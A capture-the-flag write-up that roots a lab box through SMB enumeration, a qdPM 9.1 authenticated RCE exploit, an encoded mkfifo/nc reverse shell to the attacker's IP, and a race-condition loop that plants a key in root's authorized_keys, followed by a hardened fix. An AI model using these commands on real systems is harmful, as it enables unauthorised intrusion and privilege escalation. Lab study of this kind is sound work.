Enumeration
Nmap
nmap -sC -sV 10.10.164.84

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-11 02:49 EST
Nmap scan report for 10.10.164.84
Host is up (0.39s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 72d156054b7fa6a83452f5abbb4bc0e1 (RSA)
|   256 a37505ae8e2189e50704c7a49e1d966a (ECDSA)
|_  256 229563cf260081f4f8e18afdf236322a (ED25519)
53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: -2h39m59s, deviation: 4h37m06s, median: 0s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-12-11T07:49:54
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: ubuntu
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: ubuntu
|_  System time: 2022-12-11T15:49:53+08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.74 seconds
SMB
As we can see from the nmap output above, ports 139 and 445 are open.
We can then use smbclient to list the shares that are available to users.
smbclient -L '\\10.10.164.84\'
We try to access the Development share.
smbclient '\\10.10.164.84\Development'
Access Denied :(
We further try to access the Secret share.
There is a hidden secret file lying in this share.
Got a credential, maybe useful somewhere 👀
HTTP
Port 80 is open! Let's navigate to it.
We get the default Apache page, so we can try to brute-force directories using gobuster.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.164.84/
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.164.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/11 03:02:40 Starting gobuster in directory enumeration mode
===============================================================
/project              (Status: 301) [Size: 314] [--> http://10.10.164.84/project/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.164.84/wordpress/]
/test                 (Status: 301) [Size: 311] [--> http://10.10.164.84/test/]
We got a few results; let's navigate to /project.
Ah, a web application. The first thing we look for is the version of qdPM it is running. As we can see, it is version 9.1.
We can use searchsploit to find the RCE script.
Let's use the authenticated Remote Code Execution exploit, version 2.
Exploit
We need to supply the parameters in order to exploit the vulnerable web application. We will use the credential we found in the SMB Secret share.
python3 50944.py -url http://10.10.164.84/project/ -u chris@hermoso.local -p dontL1k3w0rk1ngH3r3
Navigate to the backdoor.
Backdoor is working!
Reverse Shell
Go to revshell to generate a reverse shell payload.
What I like to use for this type of command reverse shell is the mkfifo reverse shell (works most of the time).
You need to URL-encode it.
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.4.7.170%204444%20%3E%2Ftmp%2Ff
Got a reverse shell!
We then need to spawn a proper shell using python:
python -c 'import pty; pty.spawn("/bin/bash");'
User Escalation
After some poking around, we find that the user flag is in the home folder of user chris.
Currently we don't have permission to read it.
We remember that a wordpress folder was found during the gobuster session.
There is a wp-config.php.bak lying around in there!
Reading the file, we find a credential for Chris in there.
We can then switch user to Chris and get the user flag!
Since we have the credentials, we might as well use SSH for a stable connection.
Privilege Escalation
Running sudo -l shows that user Chris can execute a script using sudo!
Let's read the script to understand what it does.
#!/bin/bash

checkAdded () {
    name=$(/bin/echo $sshKey | /usr/bin/cut -d " " -f 3)
    if [[ ! -z $(/bin/grep $name /root/.ssh/authorized_keys) ]]; then
        /bin/echo "Successfully added $name to authorized_keys file!"
    else
        /bin/echo "ssh of $name is not added to authorized_keys file!"
    fi
}

checkFile () {
    if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
        /bin/echo "Error creating key file!"
        if [[ -f $1 ]]; then /bin/rm $1; fi
        exit 1
    fi
}

addKey () {
    tmp=$(mktemp -u /tmp/ssh-XXXXXXXX)
    (umask 110; touch $tmp)
    /bin/echo $sshKey >> $tmp
    checkFile $tmp
    /bin/cat $tmp >> /root/.ssh/authorized_keys
}

sshKey="ssh-rsa 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 root@ubuntu"

addKey
checkAdded
addKey function
addKey () {
    tmp=$(mktemp -u /tmp/ssh-XXXXXXXX)
    (umask 110; touch $tmp)
    /bin/echo $sshKey >> $tmp
    checkFile $tmp
    /bin/cat $tmp >> /root/.ssh/authorized_keys
}
What this function does: it creates a temporary file inside /tmp and writes sshKey into it. Then it appends the content of that file to root's authorized_keys file.
How can we exploit this? The temporary file is created under umask 110, which only clears execute bits and so leaves the file world-writable; its name always matches /tmp/ssh-*; and the script reads it back a moment after writing it. Since the sshKey it writes is static, we can write our own public key into that temporary file before the script copies it into authorized_keys. Therefore, this is a Race Condition exploit.
As we know, if our public key is in the authorized_keys file, we can SSH in as that user without needing any password.
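For comparison, here is how the temporary-file step should have been written so that the window above does not exist. This is an added example and not the box's own CopySSHKey.sh; the destination path and the key text are placeholders rather than values from the machine, and it runs against any scratch directory. It reproduces the original umask 110 plus touch sequence only to report the permission string it leaves behind, next to the mode mktemp gives when it creates the file itself.

```bash
#!/bin/bash
# Added example, not the box's CopySSHKey.sh: the same add-key step with the
# race removed. Key text and destination path are placeholders.

# Mirrors the original creation step (mktemp -u, then touch under umask 110)
# and reports the resulting permission string, e.g. "-rw-rw-rw-".
mode_of_original_tmp() {
    tmp=$(mktemp -u "${TMPDIR:-/tmp}/ssh-XXXXXXXX") || return 1
    ( umask 110; touch "$tmp" )           # umask 110 clears only execute bits
    ls -ld -- "$tmp" | cut -c1-10
    rm -f -- "$tmp"
}

# Hardened creation step: mktemp without -u chooses the name *and* creates the
# file in one step, owner-only (0600), so nobody can pre-create or write it.
make_private_tmp() {
    ( umask 077; mktemp "${TMPDIR:-/tmp}/ssh-XXXXXXXX" )
}

# Reports the permission string of a hardened temp file, e.g. "-rw-------".
mode_of_hardened_tmp() {
    tmp=$(make_private_tmp) || return 1
    ls -ld -- "$tmp" | cut -c1-10
    rm -f -- "$tmp"
}

# Append one key line to an authorized_keys file via a private temp file,
# refusing to continue if the temp file no longer holds exactly what we wrote.
add_key_safe() {
    key="$1"
    dest="$2"
    tmp=$(make_private_tmp) || return 1
    printf '%s\n' "$key" > "$tmp"
    if [ "$(cat -- "$tmp")" != "$key" ]; then   # content changed in flight
        rm -f -- "$tmp"
        return 1
    fi
    ( umask 077; cat -- "$tmp" >> "$dest" )     # dest is created 0600 if new
    rm -f -- "$tmp"
}

# Stand-alone demonstration of the two creation steps side by side.
echo "original temp file mode: $(mode_of_original_tmp)"
echo "hardened temp file mode: $(mode_of_hardened_tmp)"
```

The simplest fix is to drop the temporary file entirely and append the key line straight to authorized_keys; the version above keeps the original structure so the difference is visible. The first field of ls -ld may carry an extra character at position 11 on systems with ACLs or SELinux, which is why the mode is cut to ten characters.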
We can go ahead and create an SSH key pair.
No passphrase is needed; press Enter all the way through.
We can then open another SSH session.
In the second session, run nano exploit.sh:
#!/bin/bash
key='your-generated-ssh-public-key'
while true
do
    echo "$key" | tee /tmp/ssh-* > /dev/null
done
Run the exploit script in the second session first.
Only then run the sudo script in the first session.
sudo /usr/local/bin/CopySSHKey.sh
Then we can go back to our Kali machine and log in using the private key that pairs with the public key we created.
ssh -i id_rsa root@10.10.164.84
Rooted!
Congratz!